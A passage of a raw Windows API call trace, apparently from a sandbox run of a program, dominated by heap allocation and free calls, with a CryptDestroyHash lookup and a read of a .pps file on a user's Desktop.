RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0159.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0159.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0159.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0159.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0159.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0159.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0159.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0159.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0159.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0159.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0159.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0159.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0159.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0159.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0159.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0159.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0159.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0159.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0159.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0159.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0159.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0159.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0159.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0159.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0159.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0159.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0159.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0159.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0159.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0159.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0159.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0159.344] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0159.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0159.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0159.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0159.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0159.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0159.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0159.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0159.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0159.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0159.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0159.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0159.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0159.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0159.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0159.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0159.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0159.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0159.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0159.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0159.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0159.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0159.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466df0 [0159.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466df0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0159.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0159.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0159.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0159.345] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0159.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0159.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0159.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0159.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0159.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0159.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0159.345] CryptDestroyHash (hHash=0xaa5660) returned 1 [0159.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0159.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0159.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0159.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0159.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0159.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0159.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0159.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0159.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0159.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0159.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0159.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0159.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0159.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0159.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0159.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0159.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0159.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0159.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0159.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0159.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0159.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0159.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0159.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0159.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0159.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0159.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0159.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0159.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0159.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0159.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0159.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0159.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0159.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0159.348] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0159.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0159.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0159.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0159.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0159.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0159.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0159.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0159.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0159.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0159.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0159.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0159.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0159.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0159.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0159.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0159.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0159.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0159.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0159.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0159.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0159.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0159.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0159.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0159.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0159.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0159.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0159.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0159.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0159.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0159.351] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0159.351] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.351] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.351] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0159.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0159.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0159.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0159.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0159.352] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/0wIFgl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0wifgl.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0159.352] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.352] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0159.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0159.352] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0159.352] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.352] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0159.352] 